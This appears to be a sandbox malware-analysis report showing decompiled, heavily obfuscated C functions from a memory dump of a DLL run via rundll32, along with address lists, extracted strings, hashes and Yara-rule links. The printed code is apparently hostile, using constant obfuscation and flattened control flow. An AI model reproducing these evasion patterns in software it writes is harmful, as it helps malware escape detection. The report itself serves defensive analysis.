Download Yara Rule

C-Code - Quality: 91%

			E1001D530(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32) {
				intOrPtr _v60;
				char _v68;
				char _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				char _t277;
				void* _t302;
				void* _t313;
				signed int _t344;
				signed int _t345;
				signed int _t346;
				signed int _t347;
				signed int _t348;
				signed int _t349;
				signed int _t350;
				signed int _t351;
				intOrPtr _t353;
				signed int* _t356;

				_push(_a32);
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(0);
				_push(0);
				_t277 = E100056B2(0);
				_v72 = _t277;
				_t353 = _t277;
				_v140 = 0xcf77;
				_t356 =  &(( &_v180)[0xa]);
				_v140 = _v140 | 0x06dd099f;
				_v140 = _v140 ^ 0x2b3fcad2;
				_t313 = 0x28b49c8b;
				_v140 = _v140 ^ 0x2de2012d;
				_v164 = 0xc4bc;
				_v164 = _v164 << 9;
				_t344 = 9;
				_v164 = _v164 * 0x2c;
				_v164 = _v164 / _t344;
				_v164 = _v164 ^ 0x0783a020;
				_v112 = 0x2b8e;
				_v112 = _v112 + 0xffffae8b;
				_t345 = 0x76;
				_v112 = _v112 * 0x7c;
				_v112 = _v112 ^ 0xffedb6fa;
				_v144 = 0xac6;
				_v144 = _v144 / _t345;
				_t346 = 0x7c;
				_v144 = _v144 / _t346;
				_v144 = _v144 >> 3;
				_v144 = _v144 ^ 0x00001557;
				_v152 = 0xab69;
				_v152 = _v152 + 0xa2f;
				_v152 = _v152 >> 5;
				_v152 = _v152 + 0xffff79cf;
				_v152 = _v152 ^ 0xffff27b1;
				_v108 = 0x73cc;
				_v108 = _v108 + 0x480f;
				_t347 = 0x59;
				_v108 = _v108 / _t347;
				_v108 = _v108 ^ 0x000020fd;
				_v100 = 0x373b;
				_v100 = _v100 * 0x66;
				_v100 = _v100 ^ 0x0016182c;
				_v104 = 0xe7a6;
				_v104 = _v104 ^ 0xf29de3d2;
				_v104 = _v104 >> 0xc;
				_v104 = _v104 ^ 0x000f640c;
				_v88 = 0x7bd1;
				_v88 = _v88 + 0xffff741d;
				_v88 = _v88 ^ 0xffffa91a;
				_v80 = 0x1764;
				_t348 = 0x17;
				_v80 = _v80 / _t348;
				_v80 = _v80 ^ 0x00004d9b;
				_v168 = 0x40e5;
				_v168 = _v168 | 0x95416268;
				_v168 = _v168 + 0xffffdda2;
				_t349 = 0x3d;
				_v168 = _v168 * 0x7e;
				_v168 = _v168 ^ 0x761d93b5;
				_v176 = 0x5c39;
				_v176 = _v176 << 3;
				_v176 = _v176 ^ 0x82f9fe57;
				_v176 = _v176 + 0xf301;
				_v176 = _v176 ^ 0x82fc4bf9;
				_v180 = 0x8c1a;
				_v180 = _v180 / _t349;
				_v180 = _v180 >> 0xf;
				_v180 = _v180 + 0x261d;
				_v180 = _v180 ^ 0x00004a95;
				_v124 = 0xc582;
				_t350 = 0x1d;
				_v124 = _v124 * 0x1f;
				_v124 = _v124 | 0xf6103699;
				_v124 = _v124 ^ 0xf617990a;
				_v156 = 0xd28e;
				_v156 = _v156 | 0xfa81b7f3;
				_v156 = _v156 << 9;
				_v156 = _v156 / _t350;
				_v156 = _v156 ^ 0x0022cbe3;
				_v96 = 0x6edc;
				_v96 = _v96 ^ 0x578c8574;
				_v96 = _v96 ^ 0x578c878c;
				_v172 = 0x2912;
				_t351 = 0x52;
				_v172 = _v172 * 0x42;
				_v172 = _v172 + 0xffffd848;
				_v172 = _v172 ^ 0xff29ff1d;
				_v172 = _v172 ^ 0xff239d47;
				_v116 = 0x4964;
				_v116 = _v116 + 0xffff6a3d;
				_v116 = _v116 << 8;
				_v116 = _v116 ^ 0xffb3a2b5;
				_v148 = 0x2770;
				_v148 = _v148 | 0xc18e9b46;
				_v148 = _v148 + 0xd34e;
				_v148 = _v148 | 0xf482d9fb;
				_v148 = _v148 ^ 0xf58f8d3b;
				_v76 = 0x8840;
				_v76 = _v76 << 6;
				_v76 = _v76 ^ 0x00221890;
				_v160 = 0xa0de;
				_v160 = _v160 / _t351;
				_v160 = _v160 + 0x938c;
				_v160 = _v160 + 0xffff507f;
				_v160 = _v160 ^ 0xffff887d;
				_v120 = 0xf500;
				_v120 = _v120 + 0xffff51ff;
				_v120 = _v120 * 0x5a;
				_v120 = _v120 ^ 0x0018abed;
				_v128 = 0xf1ed;
				_v128 = _v128 | 0x9ee1ceb0;
				_v128 = _v128 + 0xfdb4;
				_v128 = _v128 ^ 0x9ee2bb44;
				_v132 = 0xb4e7;
				_v132 = _v132 + 0x6d7b;
				_v132 = _v132 ^ 0xeb6cebb2;
				_v132 = _v132 ^ 0xeb6d8bab;
				_v136 = 0x4487;
				_v136 = _v136 >> 0xd;
				_v136 = _v136 | 0x68b8f7cc;
				_v136 = _v136 ^ 0x68b888c6;
				_v84 = 0xd92;
				_v84 = _v84 + 0xffffee93;
				_v84 = _v84 ^ 0xfffffb14;
				_v92 = 0x6345;
				_v92 = _v92 << 4;
				_v92 = _v92 ^ 0x000649ac;
				do {
					while(_t313 != 0x36a85ef) {
						if(_t313 == 0x278fc742) {
							E10001CB3( &_v68, _v108, 0x44, _v100);
							_push(0x100013e0);
							_push(_v80);
							_t316 = _v104;
							_v68 = 0x44;
							_v60 = E1001BF25(_v104, _v88, __eflags);
							_t353 = E10009BEB(_v168, _a20, _v72, _v104, _v176, _v180, _v164 | _v140, _a28, _t316, _t316,  &_v68, 0, _v124, _v156, _v96, _t316, _v172, _v116, _v148, _v76, _a8);
							E1001C5F7(_v160, _v120, _v128, _v132, _v60);
							_t356 =  &(_t356[0x1a]);
							_t313 = 0x2f47876d;
							continue;
						} else {
							if(_t313 == 0x28b49c8b) {
								_t313 = 0x36a85ef;
								continue;
							} else {
								if(_t313 != 0x2f47876d) {
									goto L12;
								} else {
									E1001B11F(_v136, _v72, _v84, _v92);
								}
							}
						}
						L6:
						return _t353;
					}
					_t302 = E10003A7E(_v112, _v144, _t313,  &_v72, _v152, _a28);
					_t356 =  &(_t356[4]);
					__eflags = _t302;
					if(_t302 == 0) {
						_t313 = 0x349a93df;
						goto L12;
					} else {
						_t313 = 0x278fc742;
						continue;
					}
					goto L6;
					L12:
					__eflags = _t313 - 0x349a93df;
				} while (_t313 != 0x349a93df);
				goto L6;
			}

0x1001d53a
0x1001d543
0x1001d54a
0x1001d551
0x1001d558
0x1001d55f
0x1001d566
0x1001d56d
0x1001d574
0x1001d575
0x1001d576
0x1001d57b
0x1001d582
0x1001d584
0x1001d58c
0x1001d58f
0x1001d599
0x1001d5a1
0x1001d5a6
0x1001d5ae
0x1001d5b6
0x1001d5c2
0x1001d5c5
0x1001d5d1
0x1001d5d5
0x1001d5dd
0x1001d5e5
0x1001d5f2
0x1001d5f5
0x1001d5f9
0x1001d601
0x1001d611
0x1001d619
0x1001d61e
0x1001d624
0x1001d629
0x1001d631
0x1001d639
0x1001d641
0x1001d646
0x1001d64e
0x1001d656
0x1001d65e
0x1001d66a
0x1001d66d
0x1001d671
0x1001d679
0x1001d686
0x1001d68a
0x1001d692
0x1001d69a
0x1001d6a2
0x1001d6a7
0x1001d6af
0x1001d6b7
0x1001d6bf
0x1001d6c7
0x1001d6d7
0x1001d6dc
0x1001d6e2
0x1001d6ea
0x1001d6f2
0x1001d6fa
0x1001d707
0x1001d70a
0x1001d70e
0x1001d716
0x1001d71e
0x1001d723
0x1001d72b
0x1001d733
0x1001d73b
0x1001d74b
0x1001d74f
0x1001d754
0x1001d75c
0x1001d764
0x1001d771
0x1001d774
0x1001d778
0x1001d780
0x1001d788
0x1001d790
0x1001d798
0x1001d7a5
0x1001d7a9
0x1001d7b1
0x1001d7b9
0x1001d7c1
0x1001d7c9
0x1001d7d6
0x1001d7d7
0x1001d7db
0x1001d7e3
0x1001d7eb
0x1001d7f3
0x1001d7fb
0x1001d803
0x1001d808
0x1001d810
0x1001d818
0x1001d820
0x1001d828
0x1001d830
0x1001d838
0x1001d840
0x1001d845
0x1001d84d
0x1001d85b
0x1001d85f
0x1001d867
0x1001d86f
0x1001d877
0x1001d87f
0x1001d88c
0x1001d890
0x1001d898
0x1001d8a0
0x1001d8a8
0x1001d8b5
0x1001d8c2
0x1001d8cf
0x1001d8d7
0x1001d8df
0x1001d8e7
0x1001d8ef
0x1001d8f4
0x1001d8fc
0x1001d904
0x1001d90c
0x1001d914
0x1001d91c
0x1001d924
0x1001d929
0x1001d931
0x1001d931
0x1001d93b
0x1001d98d
0x1001d992
0x1001d997
0x1001d9a2
0x1001d9a6
0x1001d9c0
0x1001da27
0x1001da42
0x1001da47
0x1001da4a
0x00000000
0x1001d93d
0x1001d943
0x1001d978
0x00000000
0x1001d945
0x1001d94b
0x00000000
0x1001d951
0x1001d964
0x1001d96a
0x1001d94b
0x1001d943
0x1001d96c
0x1001d977
0x1001d977
0x1001da70
0x1001da75
0x1001da78
0x1001da7a
0x1001da83
0x00000000
0x1001da7c
0x1001da7c
0x00000000
0x1001da7c
0x00000000
0x1001da85
0x1001da85
0x1001da85
0x00000000

Strings

dI, xrefs: 1001D7F3
p', xrefs: 1001D810
;7, xrefs: 1001D679
D, xrefs: 1001D9A6
{m, xrefs: 1001D8CF
9\, xrefs: 1001D716
Ec, xrefs: 1001D91C
@, xrefs: 1001D6EA

Memory Dump Source

Source File: 00000007.00000002.2098137627.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2098148687.0000000010021000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2098154346.0000000010023000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: 9\$;7$D$Ec$dI$p'${m$@
API String ID: 0-4186577645
Opcode ID: ee2cc56ee15b425d2eb46a6a225bda43ef228ac57d8ad856ce1521773d94d356
Instruction ID: 2df3e07cde59ac68a4d410155b42b42f4bafc48a528185daffa6966fbd240ac9
Opcode Fuzzy Hash: ee2cc56ee15b425d2eb46a6a225bda43ef228ac57d8ad856ce1521773d94d356
Instruction Fuzzy Hash: 95D100B15087819FE364CF65C88AA0FBBE1FBC4344F108A1DF6959A2A0D7B59945CF43

Uniqueness

Uniqueness Score: -1.00%

Function 10018F65, Relevance: 10.2, Strings: 8, Instructions: 246
COMMONCrypto

Download Yara Rule

C-Code - Quality: 97%

			E10018F65() {
				signed int _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				char _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				void* _t253;
				signed int _t254;
				void* _t256;
				signed int _t262;
				signed int _t264;
				signed int _t265;
				signed int _t266;
				signed int _t267;
				signed int _t268;
				signed int _t269;
				signed int _t270;
				signed int _t271;
				signed int _t272;
				void* _t273;
				void* _t279;
				void* _t305;
				signed int* _t309;

				_t309 =  &_v108;
				_v12 = 0x296bf2;
				_v4 = 0;
				_v8 = 0x4bf1e;
				_v100 = 0x2b2b;
				_v100 = _v100 >> 2;
				_v100 = _v100 ^ 0x417d2759;
				_v16 = 0;
				_t10 =  &_v100; // 0x417d2759
				_v100 =  *_t10 * 0x44;
				_t305 = 0x7c03eab;
				_v100 = _v100 ^ 0xe5401b0d;
				_v76 = 0xb627;
				_v76 = _v76 >> 0xd;
				_v76 = _v76 ^ 0xc3e66578;
				_v76 = _v76 ^ 0xc3e6657f;
				_v104 = 0x24d5;
				_v104 = _v104 + 0x5447;
				_t265 = 0x57;
				_v104 = _v104 / _t265;
				_t266 = 0x28;
				_v104 = _v104 * 0x32;
				_v104 = _v104 ^ 0x000071f7;
				_v40 = 0x5f61;
				_v40 = _v40 + 0xd6ed;
				_v40 = _v40 ^ 0x000138b6;
				_v108 = 0x6b22;
				_v108 = _v108 * 0x6c;
				_v108 = _v108 << 8;
				_v108 = _v108 + 0x6d5c;
				_v108 = _v108 ^ 0x2d328325;
				_v92 = 0x5cf3;
				_v92 = _v92 | 0xe469743c;
				_v92 = _v92 ^ 0x31335b62;
				_v92 = _v92 >> 6;
				_v92 = _v92 ^ 0x0355473e;
				_v64 = 0xc70a;
				_v64 = _v64 + 0xfffff4c9;
				_v64 = _v64 ^ 0x3b15d897;
				_v64 = _v64 ^ 0x3b156e76;
				_v68 = 0xfd7d;
				_v68 = _v68 / _t266;
				_v68 = _v68 + 0x951;
				_v68 = _v68 ^ 0x00007938;
				_v96 = 0x3fdb;
				_t267 = 0x66;
				_v96 = _v96 / _t267;
				_v96 = _v96 | 0x3c76ff0b;
				_t268 = 0x58;
				_v96 = _v96 * 0x45;
				_v96 = _v96 ^ 0x4c12cf42;
				_v72 = 0x1a5;
				_v72 = _v72 | 0xb959885f;
				_v72 = _v72 >> 0xc;
				_v72 = _v72 ^ 0x000bb2ca;
				_v36 = 0x7797;
				_v36 = _v36 / _t268;
				_v36 = _v36 ^ 0x0000700b;
				_v28 = 0xb618;
				_v28 = _v28 << 7;
				_v28 = _v28 ^ 0x005b051c;
				_v88 = 0xdec6;
				_v88 = _v88 >> 9;
				_v88 = _v88 ^ 0x6f8cff66;
				_t269 = 0x11;
				_t262 = _v16;
				_v88 = _v88 * 0x4e;
				_v88 = _v88 ^ 0xfcf5e555;
				_v32 = 0xe4b;
				_v32 = _v32 + 0x98e4;
				_v32 = _v32 ^ 0x00008bfc;
				_v60 = 0xce72;
				_v60 = _v60 >> 3;
				_v60 = _v60 | 0xda3ba74b;
				_v60 = _v60 ^ 0xda3bee01;
				_v48 = 0x9d97;
				_v48 = _v48 >> 0xf;
				_v48 = _v48 << 1;
				_v48 = _v48 ^ 0x000028e0;
				_v52 = 0x36fc;
				_t270 = 0x70;
				_v52 = _v52 / _t269;
				_v52 = _v52 * 0x6a;
				_v52 = _v52 ^ 0x00012e7b;
				_v56 = 0x3c40;
				_t271 = 0x4a;
				_v56 = _v56 / _t270;
				_v56 = _v56 / _t271;
				_v56 = _v56 ^ 0x000051af;
				_v84 = 0xe49b;
				_v84 = _v84 + 0xffff8d97;
				_t272 = 0x31;
				_v84 = _v84 * 0x39;
				_v84 = _v84 * 0x73;
				_v84 = _v84 ^ 0x0b6c29a9;
				_v24 = 0x471e;
				_v24 = _v24 | 0xb0cec10e;
				_v24 = _v24 ^ 0xb0cea202;
				_v44 = 0x7985;
				_v44 = _v44 * 0x70;
				_v44 = _v44 + 0xffff691b;
				_v44 = _v44 ^ 0x003485fc;
				_v80 = 0x185c;
				_t273 = 0x5c;
				_v80 = _v80 / _t272;
				_v80 = _v80 | 0x649be726;
				_v80 = _v80 + 0x7856;
				_v80 = _v80 ^ 0x649c793b;
				while(1) {
					L1:
					_t253 = 0xe31e6;
					do {
						while(_t305 != _t253) {
							if(_t305 == 0x7c03eab) {
								_t305 = 0x2ddc9b72;
								continue;
							} else {
								if(_t305 == 0x152cdf9c) {
									_push(0x10001080);
									_push(_v108);
									_t256 = E1001BF25(_v104, _v40, __eflags);
									_pop(_t279);
									__eflags = E10013659(_v92, _v64, _v68, _v96, _v72, _t279,  &_v20, _v36, _t279, _t279, _t256, _t279, _v76, _v100);
									_t305 =  ==  ? 0xe31e6 : 0x7d7e766;
									E1001C5F7(_v28, _v88, _v32, _v60, _t256);
									_t309 =  &(_t309[0x10]);
									L16:
									_t253 = 0xe31e6;
									_t273 = 0x5c;
									goto L17;
								} else {
									if(_t305 == 0x2ddc9b72) {
										_t264 =  *0x100221b0 + 0x10;
										while(1) {
											__eflags =  *_t264 - _t273;
											if(__eflags == 0) {
												break;
											}
											_t264 = _t264 + 2;
											__eflags = _t264;
										}
										_t262 = _t264 + 2;
										_t305 = 0x152cdf9c;
										goto L1;
									} else {
										if(_t305 != 0x32e2c3ea) {
											goto L17;
										} else {
											E10015483(_v24, _v44, _v80, _v20);
										}
									}
								}
							}
							L8:
							return _v16;
						}
						_t254 = E100079A2(_t262, _v48, _v52, _v56, _v84, _v20);
						_t309 =  &(_t309[4]);
						__eflags = _t254;
						_t305 = 0x32e2c3ea;
						_t225 = _t254 == 0;
						__eflags = _t225;
						_v16 = 0 | _t225;
						goto L16;
						L17:
						__eflags = _t305 - 0x7d7e766;
					} while (__eflags != 0);
					goto L8;
				}
			}

0x10018f65
0x10018f68
0x10018f72
0x10018f78
0x10018f80
0x10018f88
0x10018f8d
0x10018f95
0x10018f99
0x10018fa2
0x10018fa6
0x10018fab
0x10018fb3
0x10018fbb
0x10018fc0
0x10018fc8
0x10018fd0
0x10018fd8
0x10018fe6
0x10018feb
0x10018ff6
0x10018ff9
0x10018ffd
0x10019005
0x1001900d
0x10019015
0x1001901d
0x1001902a
0x1001902e
0x10019033
0x1001903b
0x10019043
0x1001904b
0x10019053
0x1001905b
0x10019060
0x10019068
0x10019070
0x10019078
0x10019080
0x10019088
0x10019098
0x1001909c
0x100190a4
0x100190ac
0x100190b8
0x100190bd
0x100190c3
0x100190d0
0x100190d1
0x100190d5
0x100190dd
0x100190e5
0x100190ed
0x100190f2
0x100190fa
0x10019108
0x1001910c
0x10019114
0x1001911e
0x10019128
0x10019130
0x10019138
0x1001913d
0x1001914c
0x1001914f
0x10019153
0x10019157
0x1001915f
0x10019167
0x1001916f
0x10019177
0x1001917f
0x10019184
0x1001918c
0x10019194
0x1001919c
0x100191a1
0x100191a5
0x100191ad
0x100191bb
0x100191bc
0x100191c9
0x100191cd
0x100191d5
0x100191e3
0x100191e4
0x100191f2
0x100191f8
0x10019200
0x10019208
0x10019215
0x10019218
0x10019221
0x10019225
0x1001922d
0x10019235
0x1001923d
0x10019245
0x10019252
0x10019256
0x1001925e
0x10019266
0x10019274
0x10019275
0x10019279
0x10019281
0x10019289
0x10019291
0x10019291
0x10019291
0x10019296
0x10019296
0x100192a4
0x10019378
0x00000000
0x100192aa
0x100192ac
0x100192ff
0x10019304
0x10019310
0x10019316
0x1001934d
0x1001936b
0x1001936e
0x10019373
0x100193b0
0x100193b2
0x100193b7
0x00000000
0x100192ae
0x100192b4
0x100192eb
0x100192f3
0x100192f3
0x100192f6
0x00000000
0x00000000
0x100192f0
0x100192f0
0x100192f0
0x100192f8
0x100192fb
0x00000000
0x100192b6
0x100192bc
0x00000000
0x100192c2
0x100192d2
0x100192d8
0x100192bc
0x100192b4
0x100192ac
0x100192d9
0x100192e4
0x100192e4
0x10019398
0x1001939f
0x100193a2
0x100193a4
0x100193a9
0x100193a9
0x100193ac
0x00000000
0x100193b8
0x100193b8
0x100193b8
0x00000000
0x100193c4

Strings

\m, xrefs: 10019033
@<, xrefs: 100191D5
a_, xrefs: 10019005
Y'}A, xrefs: 10018F99
Vx, xrefs: 10019281
8y, xrefs: 100190A4
(, xrefs: 100191A5
b[31, xrefs: 10019053

Memory Dump Source

Source File: 00000007.00000002.2098137627.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2098148687.0000000010021000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2098154346.0000000010023000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: 8y$@<$Vx$Y'}A$\m$a_$b[31$(
API String ID: 0-4115005019
Opcode ID: e2e8ff945d430b1b85599ee90a7361c4b7ac6e1ec00f878610a2fea6c08387fb
Instruction ID: 8b0e813e3e5c3b84958ad50093081c7edbab459e4345c4ad5d1788e5b52fe82d
Opcode Fuzzy Hash: e2e8ff945d430b1b85599ee90a7361c4b7ac6e1ec00f878610a2fea6c08387fb
Instruction Fuzzy Hash: 65B1FF715083409FE358CF25C98A90BBBE2FBC5748F10891DF1999A2A0D7B9DA498F46

Uniqueness

Uniqueness Score: -1.00%

Function 10003D4E, Relevance: 10.2, Strings: 8, Instructions: 245
COMMONCrypto

Download Yara Rule

C-Code - Quality: 98%

			E10003D4E(intOrPtr __ecx, void* __edx) {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				void* _t231;
				intOrPtr _t232;
				intOrPtr* _t233;
				intOrPtr* _t236;
				intOrPtr _t238;
				intOrPtr* _t239;
				intOrPtr _t243;
				signed int _t245;
				signed int _t246;
				signed int _t247;
				void* _t248;
				intOrPtr* _t269;
				void* _t270;
				void* _t272;
				signed int* _t273;

				_t273 =  &_v112;
				_v72 = 0x5582;
				_v72 = _v72 >> 1;
				_t272 = __edx;
				_t243 = __ecx;
				_t269 = 0;
				_t245 = 0x51;
				_v72 = _v72 / _t245;
				_v72 = _v72 ^ 0x0000601c;
				_t270 = 0x1322e1ec;
				_v36 = 0xc7c9;
				_v36 = _v36 | 0xbc8756ca;
				_v36 = _v36 ^ 0xbc8791da;
				_v56 = 0xdb25;
				_v56 = _v56 + 0xa75d;
				_v56 = _v56 ^ 0x0001a8e8;
				_v112 = 0xc6db;
				_v112 = _v112 >> 0xb;
				_v112 = _v112 >> 0xd;
				_v112 = _v112 + 0xd338;
				_v112 = _v112 ^ 0x0000d633;
				_v76 = 0xc37;
				_v76 = _v76 >> 3;
				_v76 = _v76 | 0xce4966ab;
				_v76 = _v76 ^ 0xce4936b0;
				_v108 = 0xb399;
				_v108 = _v108 << 0x10;
				_v108 = _v108 >> 1;
				_v108 = _v108 | 0x0148f084;
				_v108 = _v108 ^ 0x59ccb068;
				_v80 = 0xaa79;
				_v80 = _v80 + 0x2a7d;
				_v80 = _v80 >> 5;
				_v80 = _v80 ^ 0x0000706a;
				_v52 = 0x1cb3;
				_v52 = _v52 | 0xdfdf2f63;
				_v52 = _v52 ^ 0xdfdf2d78;
				_v40 = 0x2796;
				_v40 = _v40 << 9;
				_v40 = _v40 ^ 0x004f7581;
				_v44 = 0x2f1a;
				_t246 = 0x64;
				_v44 = _v44 / _t246;
				_v44 = _v44 ^ 0x0000485d;
				_v48 = 0x187a;
				_v48 = _v48 + 0x126d;
				_v48 = _v48 ^ 0x000074b0;
				_v104 = 0x9317;
				_v104 = _v104 >> 8;
				_v104 = _v104 << 5;
				_v104 = _v104 + 0xe504;
				_v104 = _v104 ^ 0x0000e32e;
				_v100 = 0xf551;
				_v100 = _v100 ^ 0x5a167e7d;
				_v100 = _v100 >> 7;
				_v100 = _v100 >> 0xe;
				_v100 = _v100 ^ 0x00000292;
				_v28 = 0x87ec;
				_v28 = _v28 + 0xffffd24f;
				_v28 = _v28 ^ 0x00002fae;
				_v32 = 0x1a62;
				_v32 = _v32 << 7;
				_v32 = _v32 ^ 0x000d761f;
				_v68 = 0x4d45;
				_v68 = _v68 + 0xffff90af;
				_v68 = _v68 >> 4;
				_v68 = _v68 ^ 0x0fff89e8;
				_v12 = 0x8a80;
				_v12 = _v12 | 0x7f7c99ee;
				_v12 = _v12 ^ 0x7f7cab2a;
				_v16 = 0x19cc;
				_v16 = _v16 + 0xffff6b5c;
				_v16 = _v16 ^ 0xfffffdf7;
				_v20 = 0x88ed;
				_v20 = _v20 | 0x3d0cae91;
				_v20 = _v20 ^ 0x3d0caeb7;
				_v24 = 0xdb7;
				_v24 = _v24 + 0xffffd9aa;
				_v24 = _v24 ^ 0xffffae78;
				_v96 = 0xd89d;
				_v96 = _v96 ^ 0x4d812d2a;
				_v96 = _v96 << 0xd;
				_v96 = _v96 << 2;
				_v96 = _v96 ^ 0xfadb9b11;
				_v60 = 0x63dc;
				_t247 = 0x73;
				_v60 = _v60 * 0x5f;
				_v60 = _v60 ^ 0x00257e00;
				_v64 = 0xaca0;
				_v64 = _v64 + 0x1639;
				_v64 = _v64 ^ 0x0000d793;
				_v84 = 0x1d64;
				_v84 = _v84 * 0x49;
				_v84 = _v84 + 0x2f18;
				_v84 = _v84 ^ 0x0008f6d2;
				_v4 = 0xa1b0;
				_v4 = _v4 + 0xca2d;
				_v4 = _v4 ^ 0x000177a9;
				_v88 = 0xa1e4;
				_v88 = _v88 >> 0xf;
				_v88 = _v88 + 0x87da;
				_v88 = _v88 << 7;
				_v88 = _v88 ^ 0x0043e3cc;
				_v8 = 0x4904;
				_v8 = _v8 << 6;
				_v8 = _v8 ^ 0x001263b3;
				_v92 = 0x6a47;
				_v92 = _v92 + 0xffffd61f;
				_v92 = _v92 + 0xffffa4a6;
				_v92 = _v92 / _t247;
				_v92 = _v92 ^ 0x02399718;
				while(1) {
					L1:
					_t231 = 0xbbd3b0e;
					do {
						L2:
						while(_t270 != _t231) {
							if(_t270 == 0x11fd89d0) {
								_t247 = _v100;
								_t233 = E10008997(_t247, _v28, _v32, _v68,  *_t269);
								_t273 =  &(_t273[3]);
								 *((intOrPtr*)(_t269 + 0x1c)) = _t233;
								__eflags = _t233;
								_t231 = 0xbbd3b0e;
								_t270 =  !=  ? 0xbbd3b0e : 0x2e937f96;
								continue;
							}
							if(_t270 != 0x1322e1ec) {
								if(_t270 == 0x17e19405) {
									return E100091CD(_v4, _v88, _v8, _t269, _v92);
								}
								if(_t270 == 0x25daab44) {
									 *((intOrPtr*)(_t269 + 0x20)) = _t243;
									_t238 =  *0x10021400; // 0x0
									 *((intOrPtr*)(_t269 + 0x10)) = _t238;
									 *0x10021400 = _t269;
									return _t238;
								}
								if(_t270 == 0x29623426) {
									_push(_v112);
									_t239 = E10005BE1(_v56, _t272, __eflags, _t247);
									 *_t269 = _t239;
									_pop(_t247);
									__eflags = _t239;
									if(__eflags == 0) {
										goto L10;
									} else {
										E100039D1(_v108, _v80,  *_t269, _v52, _t239);
										_t247 = _v40;
										E100056B3(_v44, _v48,  *_t269, _v104);
										_t273 =  &(_t273[7]);
										_t270 = 0x11fd89d0;
										while(1) {
											L1:
											_t231 = 0xbbd3b0e;
											goto L2;
										}
									}
									goto L13;
								} else {
									if(_t270 != 0x2e937f96) {
										goto L19;
									} else {
										E10018C8B(_v60, _v64, _v84,  *_t269);
										_pop(_t247);
										L10:
										_t270 = 0x17e19405;
										while(1) {
											L1:
											_t231 = 0xbbd3b0e;
											goto L2;
										}
									}
								}
								L23:
								return _t236;
							}
							L13:
							_t248 = 0x24;
							_t236 = E100157E8(_t248);
							_t269 = _t236;
							_t247 = _t247;
							__eflags = _t269;
							if(__eflags != 0) {
								_t270 = 0x29623426;
								while(1) {
									L1:
									_t231 = 0xbbd3b0e;
									goto L2;
								}
							}
							goto L23;
						}
						_t247 = _v12;
						_t232 = E1000D6D8(_t247, _v16, _t247, E10008816, _v20, _t247, _t269, _t247, _t247, _v24, _v96);
						_t273 =  &(_t273[9]);
						 *((intOrPtr*)(_t269 + 4)) = _t232;
						__eflags = _t232;
						if(__eflags == 0) {
							_t270 = 0x2e937f96;
							_t231 = 0xbbd3b0e;
							goto L19;
						} else {
							_t270 = 0x25daab44;
							goto L1;
						}
						goto L23;
						L19:
						__eflags = _t270 - 0x32655ae2;
					} while (__eflags != 0);
					return _t231;
				}
			}

0x10003d4e
0x10003d51
0x10003d59
0x10003d65
0x10003d67
0x10003d6d
0x10003d6f
0x10003d74
0x10003d7a
0x10003d82
0x10003d87
0x10003d8f
0x10003d97
0x10003d9f
0x10003da7
0x10003daf
0x10003db7
0x10003dbf
0x10003dc4
0x10003dc9
0x10003dd1
0x10003dd9
0x10003de1
0x10003de6
0x10003dee
0x10003df6
0x10003dfe
0x10003e03
0x10003e07
0x10003e0f
0x10003e17
0x10003e1f
0x10003e27
0x10003e2c
0x10003e34
0x10003e3c
0x10003e44
0x10003e4c
0x10003e54
0x10003e59
0x10003e61
0x10003e6d
0x10003e70
0x10003e74
0x10003e7c
0x10003e84
0x10003e8c
0x10003e94
0x10003e9c
0x10003ea1
0x10003ea6
0x10003eae
0x10003eb6
0x10003ebe
0x10003ec6
0x10003ecb
0x10003ed0
0x10003ed8
0x10003ee0
0x10003ee8
0x10003ef0
0x10003ef8
0x10003efd
0x10003f05
0x10003f0d
0x10003f15
0x10003f1a
0x10003f22
0x10003f2a
0x10003f32
0x10003f3a
0x10003f44
0x10003f4c
0x10003f54
0x10003f5c
0x10003f64
0x10003f6c
0x10003f74
0x10003f7c
0x10003f84
0x10003f8c
0x10003f94
0x10003f99
0x10003f9e
0x10003fa6
0x10003fb5
0x10003fb6
0x10003fba
0x10003fc2
0x10003fca
0x10003fd2
0x10003fda
0x10003fe7
0x10003feb
0x10003ff3
0x10003ffb
0x10004003
0x1000400b
0x10004013
0x1000401b
0x10004020
0x10004028
0x1000402d
0x10004035
0x1000403d
0x10004042
0x1000404a
0x10004052
0x1000405a
0x10004068
0x1000406c
0x10004074
0x10004074
0x10004074
0x10004079
0x00000000
0x10004079
0x10004087
